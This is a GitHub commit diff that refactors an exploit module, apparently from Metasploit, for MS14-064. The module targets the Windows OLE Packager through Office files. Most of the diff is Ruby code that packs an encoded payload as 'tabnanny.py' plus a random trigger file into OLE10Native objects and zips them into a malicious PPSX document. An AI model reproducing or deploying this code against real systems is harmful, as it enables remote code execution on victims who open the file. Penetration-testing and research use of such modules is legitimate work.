Skip to content

Commit 31f3aa1

Browse files
jvazquez-r7jvazquez-r7
committed
Refactor create packager methods
1 parent 38a96e3 commit 31f3aa1

File tree

1 file changed

+17
-49
lines changed

1 file changed

+17
-49
lines changed

modules/exploits/windows/fileformat/ms14_064_packager_python.rb

Lines changed: 17 additions & 49 deletions
Original file line numberDiff line numberDiff line change
@@ -60,6 +60,8 @@ def initialize(info={})
6060

6161
def exploit
6262
print_status("Creating '#{datastore['FILENAME']}' file ...")
63+
payload_packager = create_packager('tabnanny.py', payload.encoded)
64+
trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
6365
zip = zip_ppsx(payload_packager, trigger_packager)
6466
file_create(zip)
6567
end
@@ -91,59 +93,25 @@ def zip_ppsx(ole_payload, ole_trigger)
9193
ppsx.pack
9294
end
9395

94-
def payload_packager
95-
payload_name = 'tabnanny.py'
96-
97-
file_info = [2].pack('v')
98-
file_info << "#{payload_name}\x00"
99-
file_info << "#{payload_name}\x00"
100-
file_info << "\x00\x00"
101-
102-
extract_info = [3].pack('v')
103-
extract_info << [payload_name.length + 1].pack('V')
104-
extract_info << "#{payload_name}\x00"
105-
106-
p = payload.encoded
107-
file = [p.length].pack('V')
108-
file << p
109-
110-
append_info = [payload_name.length].pack('V')
111-
append_info << Rex::Text.to_unicode(payload_name)
112-
append_info << [payload_name.length].pack('V')
113-
append_info << Rex::Text.to_unicode(payload_name)
114-
append_info << [payload_name.length].pack('V')
115-
append_info << Rex::Text.to_unicode(payload_name)
116-
117-
ole_data = file_info + extract_info + file + append_info
118-
ole_contents = [ole_data.length].pack('V') + ole_data
119-
120-
ole = create_ole("\x01OLE10Native", ole_contents)
121-
122-
ole
123-
end
124-
125-
def trigger_packager
126-
payload_name = "#{rand_text_alpha(4)}.py"
127-
96+
def create_packager(file_name, contents)
12897
file_info = [2].pack('v')
129-
file_info << "#{payload_name}\x00"
130-
file_info << "#{payload_name}\x00"
98+
file_info << "#{file_name}\x00"
99+
file_info << "#{file_name}\x00"
131100
file_info << "\x00\x00"
132101

133102
extract_info = [3].pack('v')
134-
extract_info << [payload_name.length + 1].pack('V')
135-
extract_info << "#{payload_name}\x00"
136-
137-
random_text = rand_text_alpha(4 + rand(4))
138-
file = [random_text.length].pack('V')
139-
file << random_text
140-
141-
append_info = [payload_name.length].pack('V')
142-
append_info << Rex::Text.to_unicode(payload_name)
143-
append_info << [payload_name.length].pack('V')
144-
append_info << Rex::Text.to_unicode(payload_name)
145-
append_info << [payload_name.length].pack('V')
146-
append_info << Rex::Text.to_unicode(payload_name)
103+
extract_info << [file_name.length + 1].pack('V')
104+
extract_info << "#{file_name}\x00"
105+
106+
file = [contents.length].pack('V')
107+
file << contents
108+
109+
append_info = [file_name.length].pack('V')
110+
append_info << Rex::Text.to_unicode(file_name)
111+
append_info << [file_name.length].pack('V')
112+
append_info << Rex::Text.to_unicode(file_name)
113+
append_info << [file_name.length].pack('V')
114+
append_info << Rex::Text.to_unicode(file_name)
147115

148116
ole_data = file_info + extract_info + file + append_info
149117
ole_contents = [ole_data.length].pack('V') + ole_data

0 commit comments

Comments
 (0)